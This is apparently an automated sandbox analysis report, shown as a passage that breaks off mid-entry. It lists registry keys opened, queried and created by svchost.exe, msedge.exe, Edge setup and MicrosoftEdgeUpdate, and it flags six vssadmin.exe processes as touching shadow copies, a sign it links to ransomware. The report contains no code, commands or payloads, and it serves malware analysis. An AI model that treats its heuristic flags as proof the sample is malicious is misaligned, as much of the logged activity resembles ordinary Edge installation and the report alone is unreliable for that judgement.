\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 svchost.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 5432 vssadmin.exe 5440 vssadmin.exe 5472 vssadmin.exe 6072 vssadmin.exe 6084 vssadmin.exe 5072 vssadmin.exe -
Processes:
setup.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\101.0.1210.53\\BHO" setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\101.0.1210.53\\BHO" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" setup.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
MicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed MicrosoftEdgeUpdate.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exesetup.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdate.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachine.1.0\CLSID\ = "{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}\Elevation MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\ProgID\ = "MicrosoftEdgeUpdate.Update3WebMachineFallback.1.0" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebSvc\ = "Microsoft Edge Update Update3Web" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\microsoft-edge\shell\open setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ = "IGoogleUpdate3" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\ProxyStubClsid32\ = "{5F64EF81-5A6B-4203-9374-16218714CDFF}" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\ProxyStubClsid32\ = "{5F64EF81-5A6B-4203-9374-16218714CDFF}" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF} MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\ = "IApp" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\Elevation MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5F6A18BB-6231-424B-8242-19E5BB94F8ED} MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83} MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\ProgID MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4} MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ = "IProcessLauncher2" MicrosoftEdgeUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\LOCALSERVER32 MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\Elevation\IconReference = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.157.61\\msedgeupdate.dll,-1004" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC} MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM\shell\open setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ = "IAppVersionWeb" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\LocalizedString = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.161.35\\msedgeupdate.dll,-3000" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachineFallback\ = "Microsoft Edge Update Legacy On Demand" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\Software\Classes\MSEdgePDF\shell\runas setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ = "IGoogleUpdate3WebSecurity" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ = "ICoCreateAsync" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ = "IProcessLauncher2" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\VersionIndependentProgID MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A} MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ = "IGoogleUpdate3WebSecurity" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E816B022-B276-4CA0-B42A-E3EF8927EFD2} MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC} MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9F3F5F5D-721A-4B19-9B5D-69F664C1A591}\ProgID MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\NumMethods\ = "10" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachineFallback\CLSID\ = "{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8F09CD6C-5964-4573-82E3-EBFF7702865B}\VersionIndependentProgID\ = "MicrosoftEdgeUpdate.CoreClass" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\ = "IAppCommand2" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\NumMethods\ = "11" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3COMClassService.1.0\CLSID\ = "{CECDDD22-2E72-4832-9606-A9B0E5E344B2}" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\ProxyStubClsid32\ = "{E816B022-B276-4CA0-B42A-E3EF8927EFD2}" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\ = "ICurrentState" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachineFallback\ = "Microsoft Edge Update Legacy On Demand" MicrosoftEdgeUpdate.exe Key created 